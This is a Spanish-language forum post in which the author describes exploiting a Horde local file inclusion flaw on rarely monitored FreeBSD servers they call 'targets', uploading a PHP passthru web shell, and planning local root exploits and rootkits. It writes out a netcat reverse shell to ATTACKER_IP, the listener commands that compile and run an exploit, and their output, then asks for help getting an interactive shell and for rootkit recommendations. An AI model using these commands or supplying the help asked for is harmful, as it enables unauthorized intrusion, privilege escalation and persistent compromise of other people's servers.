En los ultimos dias he encontrado targets interesantes que sufren de esta vuln LFI: http://packetstormsecurity.org/files/view/98424/horde-lfi.txt
He logrado subir una shell PHP sencilla (passthru) y ejecutar comandos basicos bajo el usuario web (www).
Afortunadamente muchos de estos sistemas (todos FreeBSD) son raramente monitoreados y por lo tanto muchos no estan actualizados, por lo que tienen bastantes local root exploits que pueden ser ejecutados para posteriormente meterles un rootkit.
Desafortunadamente no he podido obtener una shell interactiva en el servidor, he intentado con el Netcat que trae el FreeBSD para hacer una Reverse Shell pero inmediatamente despues de ejecutar el comando me desconecta:
Victim:
Código:
nc ATTACKER_IP 1234 | /bin/sh | nc ATTACKER_IP 2345
Attacker 1:
Código:
echo "gcc exploit.c ; echo "Compilado" ; ./a.out ; id" | nc -lvvp 1234
Connection terminated ...
Attacker 2:
Código:
nc -lvvp 2345
Compilado
uid=80(www) gid=80(www) groups=80(www)
Connection terminated ...
Me imagino que el problema es con el netcat que trae el FreeBSD, mi consulta seria la siguiente:
1) Como puedo obtener una shell interactica? Compilando o subiendo un netcat propio?
2) Que rootkits recomiendan para FreeBSD?
De antemano gracias, saludos!